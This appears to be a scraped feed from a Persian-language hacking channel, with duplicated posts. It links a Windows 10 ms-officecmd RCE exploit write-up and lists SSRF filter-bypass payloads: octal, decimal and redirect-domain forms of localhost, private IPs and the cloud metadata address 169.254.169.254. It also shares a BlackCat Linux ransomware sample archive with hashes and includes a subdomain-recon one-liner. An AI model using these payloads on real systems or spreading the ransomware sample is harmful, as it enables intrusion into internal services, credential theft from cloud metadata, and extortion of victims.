کتاب آموزش کامل ترموکس.PDF
6.2 MB
کتاب آموزش کامل ترموکس و دستورات لینوکسی با تصویر و مثال
Windows 10 RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
The exploit is in the link
Link : https://positive.security/blog/ms-officecmd-rce
#RCE
positive.security
Windows 10 RCE: The exploit is in the link | Positive Security
Chaining a misconfiguration in IE11/Edge Legacy with an argument injection in a Windows 10/11 default URI handler and a bypass for a previous Electron patch, we developed a drive-by RCE exploit for Windows 10. The main vulnerability in the ms-officecmd URI…
Bypass using octal IP
Implementations differ on how to handle octal format of ipv4.
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
Implementations differ on how to handle octal format of ipv4.
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
Bypass using a decimal IP location
http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
http://2130706433/ = http://127.0.0.1
http://3232235521/ =http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
Bypass localhost with a domain redirection
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
BlackCat_Linux_Ransom.7z
1.2 MB
😈BlackCat Ransomware Linux variant.😈
-V x32:
843001980e5073c7f0ea8b56873246b8
-V x64: 79fea7f741760ea21ff655137af05bd0
#kernel #blackcat #ransomware #linux
@matitanium
-V x32:
843001980e5073c7f0ea8b56873246b8
-V x64: 79fea7f741760ea21ff655137af05bd0
#kernel #blackcat #ransomware #linux
@matitanium
CyberSecurity
Voice message
برای مثال
subfinder -d example.com | httpx -status-code -ip -mc 200
subfinder -d example.com | httpx -status-code -ip -mc 200